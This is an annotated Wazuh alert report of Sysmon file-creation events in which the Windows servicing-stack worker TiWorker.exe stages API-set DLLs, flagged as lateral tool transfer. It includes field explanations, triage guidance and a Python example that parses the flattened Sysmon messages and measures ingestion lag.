data.win.system.eventRecordID:  260612
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.233 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-debug-l1-1-1.dll CreationUtcTime: 2025-04-20 01:55:28.233 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.233
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-debug-l1-1-1.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.233
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.564+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.564+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  28
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.703960
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2373860Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260613
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.235 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-delayload-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.235 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.235
Sysmon's own UTC timestamp for the event, millisecond precision. Should agree with data.win.system.systemTime to within a few ms.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
Sysmon's GUID for the creating process: stable for the process lifetime and unique even after PID reuse. Pivot on it to find the matching Event ID 1 (process create) and every other file/network event from the same process; all alerts in this burst share one GUID, i.e. one process.

data.win.eventdata.processId:  12512
PID of the process that created the file. PIDs are recycled, so correlate on processGuid rather than on this number.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
Full path of the process that created the file. Here it is TiWorker.exe (Windows Modules Installer worker) loaded from a WinSxS servicing-stack directory, the expected writer while Windows Update is staging files. Confirm the path and Authenticode signature on the host before calling it benign; a TiWorker.exe anywhere else is a different case.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-delayload-l1-1-0.dll
Path of the file that was created: an api-ms-win-* API-set stub DLL staged under C:\Windows\Temp\SSS_… by the servicing stack. Being under C:\Windows is what tripped rule 92217; the rule does not distinguish the servicing stack from an attacker's drop.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.235
Creation timestamp carried by the file itself. Normally equals utcTime (within a few ms, as here); a much older value means a copied file kept its original timestamp or was backdated.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
Account the creating process ran as. NT AUTHORITY\SYSTEM is expected for the servicing stack; the same write by an interactive user account would deserve far more attention.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.
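The data.win.system.message value above is the whole Sysmon record flattened onto one line, and the data.win.eventdata.* fields are decoded from it. The following is an added example, written for this page and not part of SOCscribe or Wazuh: it parses that flattened text back into fields, runs the triage checks a practitioner would apply to this alert (is the writer the servicing-stack TiWorker.exe, is it running as SYSTEM, is the target an api-ms-win-* stub under C:\Windows\Temp\SSS_…), and computes the ingestion lag between the Wazuh alert timestamp and the event's systemTime. The sample message and timestamps are copied from this alert; the allowlist patterns, the verdict strings and the contrast message are assumptions of the example, not a Wazuh rule.

```python
import re
from datetime import datetime

# Sysmon Event ID 11 (FileCreate) fields, in the order Sysmon emits them. The
# Wazuh agent joins the original newline-separated "Key: value" lines with
# spaces, so values (paths, "NT AUTHORITY\SYSTEM") may contain spaces; split
# on the known keys, not on whitespace.
EID11_KEYS = ("RuleName", "UtcTime", "ProcessGuid", "ProcessId", "Image",
              "TargetFilename", "CreationUtcTime", "User")
_KEY_RE = re.compile(r"(?:^|\s)(%s): " % "|".join(EID11_KEYS))

# Constructed sample: the data.win.system.message of this alert, its Wazuh
# alert timestamp and the event's data.win.system.systemTime.
SAMPLE_MESSAGE = (
    r"File created: RuleName: - UtcTime: 2025-04-20 01:55:28.235 "
    r"ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 "
    r"Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe "
    r"TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-delayload-l1-1-0.dll "
    r"CreationUtcTime: 2025-04-20 01:55:28.235 User: NT AUTHORITY\SYSTEM"
)
SAMPLE_ALERT_TS = "2025-04-24T22:35:54.565+0000"
SAMPLE_SYSTEM_TIME = "2025-04-20T01:55:28.2373860Z"

# Constructed contrast case (not from the report): same target file, but the
# writer is a TiWorker.exe copy outside WinSxS running as an ordinary user.
SUSPICIOUS_MESSAGE = SAMPLE_MESSAGE.replace(
    r"C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe",
    r"C:\Users\Public\TiWorker.exe").replace(r"NT AUTHORITY\SYSTEM", r"WORKGROUP\user1")


def parse_sysmon_message(message: str) -> dict:
    """Recover {field: value} from a flattened Sysmon message."""
    hits = list(_KEY_RE.finditer(message))
    fields = {}
    for i, hit in enumerate(hits):
        end = hits[i + 1].start() if i + 1 < len(hits) else len(message)
        fields[hit.group(1)] = message[hit.end():end].strip()
    if hits:  # text before the first key is the event type, e.g. "File created:"
        fields["EventType"] = message[:hits[0].start()].strip().rstrip(":")
    return fields


# Assumption of this example (not a Wazuh rule): the servicing stack's worker,
# loaded from its WinSxS assembly directory (31bf3856ad364e35 is the Microsoft
# public key token used in WinSxS names), writing API-set stub DLLs into
# C:\Windows\Temp\SSS_<hex>\ as SYSTEM. A match means "probably an update in
# progress, confirm on the host", never proof.
SERVICING_IMAGE_RE = re.compile(
    r"^C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_"
    r"31bf3856ad364e35_[0-9.]+_none_[0-9a-f]{16}\\TiWorker\.exe$", re.IGNORECASE)
SERVICING_TARGET_RE = re.compile(
    r"^C:\\Windows\\Temp\\SSS_[0-9a-f]{32}\\(?:[^\\]+\\)*api-ms-win-[a-z0-9-]+\.dll$",
    re.IGNORECASE)


def triage(fields: dict) -> dict:
    """Classify one EID 11 alert; returns a verdict and the reasons for it."""
    reasons = []
    if not SERVICING_IMAGE_RE.match(fields.get("Image", "")):
        reasons.append("writer is not the servicing-stack TiWorker.exe")
    if not SERVICING_TARGET_RE.match(fields.get("TargetFilename", "")):
        reasons.append("target is not an api-ms-win-* stub under C:\\Windows\\Temp\\SSS_*")
    if fields.get("User", "").upper() != r"NT AUTHORITY\SYSTEM":
        reasons.append("writer is not running as SYSTEM")
    verdict = "investigate" if reasons else "servicing-stack write (verify TiWorker.exe signature on host)"
    return {"verdict": verdict, "reasons": reasons}


def parse_ts(ts: str) -> datetime:
    """Normalise Wazuh ('...+0000') and Windows ('...Z', 7-digit fraction)
    timestamps into a form datetime.fromisoformat accepts on any Python 3.7+."""
    ts = ts.strip().replace("Z", "+00:00")
    ts = re.sub(r"([+-]\d{2})(\d{2})$", r"\1:\2", ts)  # +0000 -> +00:00
    ts = re.sub(r"\.(\d+)", lambda m: "." + m.group(1)[:6].ljust(6, "0"), ts)  # exactly 6 digits
    return datetime.fromisoformat(ts)


def ingestion_lag_seconds(alert_ts: str, event_system_time: str) -> float:
    """Seconds between the endpoint writing the event and the Wazuh manager
    raising the alert. Large values mean a backlog was replayed, and the
    alert timestamp is then useless for the incident timeline."""
    return (parse_ts(alert_ts) - parse_ts(event_system_time)).total_seconds()


if __name__ == "__main__":
    fields = parse_sysmon_message(SAMPLE_MESSAGE)
    print(triage(fields))
    print(triage(parse_sysmon_message(SUSPICIOUS_MESSAGE)))
    print("ingestion lag: %.0f s" % ingestion_lag_seconds(SAMPLE_ALERT_TS, SAMPLE_SYSTEM_TIME))
```

The key-based split is deliberate: splitting the flattened message on whitespace would break "NT AUTHORITY\SYSTEM" and any path containing a space. The lag for this alert comes out at roughly 420,000 seconds, which is why the report's alert timestamps cannot be used to order these events.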

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.565+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[T1570 Lateral Tool Transfer] No playbook entry yet; triage from the fields below. The writer is TiWorker.exe loaded from a WinSxS servicing-stack directory, running as NT AUTHORITY\SYSTEM, and the target is an api-ms-win-* DLL under C:\Windows\Temp\SSS_…, which is what the servicing stack does while Windows Update stages a package. Before closing as benign, confirm on the endpoint that that TiWorker.exe path exists with a valid Microsoft Authenticode signature and that a servicing/update run was in progress at data.win.system.systemTime; escalate if the writer is any other binary or account.

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.565+0000
When the Wazuh manager raised the alert, not when the event happened. Here it is 2025-04-24 while data.win.system.systemTime is 2025-04-20, roughly four days of ingestion lag, so anchor the timeline on systemTime and treat this as the processing time.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  29
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.707070
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event, here Microsoft-Windows-Sysmon. It decides which schema eventID is read against (Sysmon's, not the Security log's).

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's. Handy when filtering raw EVTX/ETW data where the provider name is absent.

data.win.system.eventID:  11
Windows Event ID. In the Security log these are the classic 4624/4688 IDs; in the Microsoft-Windows-Sysmon/Operational channel (this alert) 11 = FileCreate, so read it against Sysmon's event table, not the Security-log one.

data.win.system.version:  2
Version of the event's schema/template. Sysmon bumps it when fields change; only matters if a decoder stops matching.

data.win.system.level:  4
Numeric Windows event level: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose. Sysmon logs every match at 4, so this carries no signal on its own.

data.win.system.task:  11
Task category number. Security-log events map it to names (Logon, Policy Change); Sysmon simply mirrors the event ID, so 11 = File created.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2613251Z
UTC time the endpoint wrote the event, i.e. when the file was actually created. Here it is 2025-04-20, four days before the Wazuh timestamp above: build the timeline from this field, not from the alert time.

data.win.system.eventRecordID:  260622
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, the Sysmon service (3712 in every event here), NOT the process that created the file. The writer's PID is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the logging (Sysmon) process that wrote the record. Forensic detail only.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Windows Event Log channel the record came from. Microsoft-Windows-Sysmon/Operational means field semantics follow the Sysmon schema, not the Security log.

data.win.system.computer:  Attacker
Computer name the endpoint reported inside the event. Should equal agent.name; a mismatch points to a renamed host or a forwarded/relayed log.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.260 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\API-MS-Win-core-file-l2-1-1.dll CreationUtcTime: 2025-04-20 01:55:28.260 User: NT AUTHORITY\SYSTEM"
The full rendered Sysmon text, flattened onto one line by the Wazuh agent. It carries the same fields as data.win.eventdata.* below; fall back to it when a decoded field looks truncated or mangled.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.260
Sysmon's own UTC timestamp for the event, millisecond precision. Should agree with data.win.system.systemTime to within a few ms.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
Sysmon's GUID for the creating process: stable for the process lifetime and unique even after PID reuse. Pivot on it to find the matching Event ID 1 (process create) and every other file/network event from the same process; all alerts in this burst share one GUID, i.e. one process.

data.win.eventdata.processId:  12512
PID of the process that created the file. PIDs are recycled, so correlate on processGuid rather than on this number.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
Full path of the process that created the file. Here it is TiWorker.exe (Windows Modules Installer worker) loaded from a WinSxS servicing-stack directory, the expected writer while Windows Update is staging files. Confirm the path and Authenticode signature on the host before calling it benign; a TiWorker.exe anywhere else is a different case.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\API-MS-Win-core-file-l2-1-1.dll
Path of the file that was created: an api-ms-win-* API-set stub DLL staged under C:\Windows\Temp\SSS_… by the servicing stack. Being under C:\Windows is what tripped rule 92217; the rule does not distinguish the servicing stack from an attacker's drop.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.260
Creation timestamp carried by the file itself. Normally equals utcTime (within a few ms, as here); a much older value means a copied file kept its original timestamp or was backdated.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
Account the creating process ran as. NT AUTHORITY\SYSTEM is expected for the servicing stack; the same write by an interactive user account would deserve far more attention.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.580+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[T1570 Lateral Tool Transfer] No playbook entry yet; triage from the fields below. The writer is TiWorker.exe loaded from a WinSxS servicing-stack directory, running as NT AUTHORITY\SYSTEM, and the target is an api-ms-win-* DLL under C:\Windows\Temp\SSS_…, which is what the servicing stack does while Windows Update stages a package. Before closing as benign, confirm on the endpoint that that TiWorker.exe path exists with a valid Microsoft Authenticode signature and that a servicing/update run was in progress at data.win.system.systemTime; escalate if the writer is any other binary or account.

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.580+0000
When the Wazuh manager raised the alert, not when the event happened. Here it is 2025-04-24 while data.win.system.systemTime is 2025-04-20, roughly four days of ingestion lag, so anchor the timeline on systemTime and treat this as the processing time.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  30
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.710160
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event, here Microsoft-Windows-Sysmon. It decides which schema eventID is read against (Sysmon's, not the Security log's).

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's. Handy when filtering raw EVTX/ETW data where the provider name is absent.

data.win.system.eventID:  11
Windows Event ID. In the Security log these are the classic 4624/4688 IDs; in the Microsoft-Windows-Sysmon/Operational channel (this alert) 11 = FileCreate, so read it against Sysmon's event table, not the Security-log one.

data.win.system.version:  2
Version of the event's schema/template. Sysmon bumps it when fields change; only matters if a decoder stops matching.

data.win.system.level:  4
Numeric Windows event level: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose. Sysmon logs every match at 4, so this carries no signal on its own.

data.win.system.task:  11
Task category number. Security-log events map it to names (Logon, Policy Change); Sysmon simply mirrors the event ID, so 11 = File created.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2870179Z
UTC time the endpoint wrote the event, i.e. when the file was actually created. Here it is 2025-04-20, four days before the Wazuh timestamp above: build the timeline from this field, not from the alert time.

data.win.system.eventRecordID:  260632
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, the Sysmon service (3712 in every event here), NOT the process that created the file. The writer's PID is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the logging (Sysmon) process that wrote the record. Forensic detail only.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Windows Event Log channel the record came from. Microsoft-Windows-Sysmon/Operational means field semantics follow the Sysmon schema, not the Security log.

data.win.system.computer:  Attacker
Computer name the endpoint reported inside the event. Should equal agent.name; a mismatch points to a renamed host or a forwarded/relayed log.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.286 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\API-MS-Win-Core-Kernel32-Private-L1-1-1.dll CreationUtcTime: 2025-04-20 01:55:28.284 User: NT AUTHORITY\SYSTEM"
The full rendered Sysmon text, flattened onto one line by the Wazuh agent. It carries the same fields as data.win.eventdata.* below; fall back to it when a decoded field looks truncated or mangled.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.286
Sysmon's own UTC timestamp for the event, millisecond precision. Should agree with data.win.system.systemTime to within a few ms.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
Sysmon's GUID for the creating process: stable for the process lifetime and unique even after PID reuse. Pivot on it to find the matching Event ID 1 (process create) and every other file/network event from the same process; all alerts in this burst share one GUID, i.e. one process.

data.win.eventdata.processId:  12512
PID of the process that created the file. PIDs are recycled, so correlate on processGuid rather than on this number.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
Full path of the process that created the file. Here it is TiWorker.exe (Windows Modules Installer worker) loaded from a WinSxS servicing-stack directory, the expected writer while Windows Update is staging files. Confirm the path and Authenticode signature on the host before calling it benign; a TiWorker.exe anywhere else is a different case.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\API-MS-Win-Core-Kernel32-Private-L1-1-1.dll
Path of the file that was created: an api-ms-win-* API-set stub DLL staged under C:\Windows\Temp\SSS_… by the servicing stack. Being under C:\Windows is what tripped rule 92217; the rule does not distinguish the servicing stack from an attacker's drop.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.284
Creation timestamp carried by the file itself. Normally equals utcTime (within a few ms, as here); a much older value means a copied file kept its original timestamp or was backdated.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
Account the creating process ran as. NT AUTHORITY\SYSTEM is expected for the servicing stack; the same write by an interactive user account would deserve far more attention.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.598+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[T1570 Lateral Tool Transfer] No playbook entry yet; triage from the fields below. The writer is TiWorker.exe loaded from a WinSxS servicing-stack directory, running as NT AUTHORITY\SYSTEM, and the target is an api-ms-win-* DLL under C:\Windows\Temp\SSS_…, which is what the servicing stack does while Windows Update stages a package. Before closing as benign, confirm on the endpoint that that TiWorker.exe path exists with a valid Microsoft Authenticode signature and that a servicing/update run was in progress at data.win.system.systemTime; escalate if the writer is any other binary or account.

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.598+0000
When the Wazuh manager raised the alert, not when the event happened. Here it is 2025-04-24 while data.win.system.systemTime is 2025-04-20, roughly four days of ingestion lag, so anchor the timeline on systemTime and treat this as the processing time.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  31
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
